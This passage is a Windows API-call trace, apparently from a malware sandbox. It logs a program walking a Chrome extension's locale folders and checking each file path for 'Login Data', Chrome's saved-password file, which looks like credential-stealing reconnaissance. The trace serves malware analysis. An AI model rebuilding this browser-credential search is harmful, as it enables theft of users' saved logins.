Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\" [0161.699] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" [0161.699] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.699] GetProcessHeap () returned 0x8e0000 [0161.699] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.699] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.699] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.699] GetProcessHeap () returned 0x8e0000 [0161.699] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.700] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.700] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.700] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.700] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.700] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="he", cAlternateFileName="")) returned 1 [0161.700] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0161.700] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0161.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.700] lstrlenW (lpString="\\") returned 1 [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.700] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.700] lstrlenW (lpString="he") returned 2 [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.700] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" [0161.700] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned 137 [0161.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned 137 [0161.700] lstrlenW (lpString="\\*.*") returned 4 [0161.700] GetProcessHeap () returned 0x8e0000 [0161.700] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" [0161.701] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*.*" [0161.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.701] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.701] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.701] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned 137 [0161.701] lstrlenW (lpString="\\") returned 1 [0161.701] GetProcessHeap () returned 0x8e0000 [0161.701] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he" [0161.702] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\" [0161.702] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\") returned 138 [0161.702] lstrlenW (lpString="messages.json") returned 13 [0161.702] GetProcessHeap () returned 0x8e0000 [0161.702] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\" [0161.702] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" [0161.702] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.702] GetProcessHeap () returned 0x8e0000 [0161.702] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.702] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json", lpSrch="Login Data") returned 0x0 [0161.702] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.702] GetProcessHeap () returned 0x8e0000 [0161.702] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.702] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.702] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.702] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.702] GetProcessHeap () returned 0x8e0000 [0161.702] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.702] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.702] GetProcessHeap () returned 0x8e0000 [0161.702] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.702] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="hi", cAlternateFileName="")) returned 1 [0161.703] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0161.703] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0161.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.703] lstrlenW (lpString="\\") returned 1 [0161.703] GetProcessHeap () returned 0x8e0000 [0161.703] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.703] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.703] lstrlenW (lpString="hi") returned 2 [0161.703] GetProcessHeap () returned 0x8e0000 [0161.703] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.703] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" [0161.703] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.703] GetProcessHeap () returned 0x8e0000 [0161.703] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned 137 [0161.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned 137 [0161.703] lstrlenW (lpString="\\*.*") returned 4 [0161.703] GetProcessHeap () returned 0x8e0000 [0161.703] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" [0161.703] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*.*" [0161.703] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.703] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.704] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.704] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.704] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.704] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned 137 [0161.704] lstrlenW (lpString="\\") returned 1 [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS 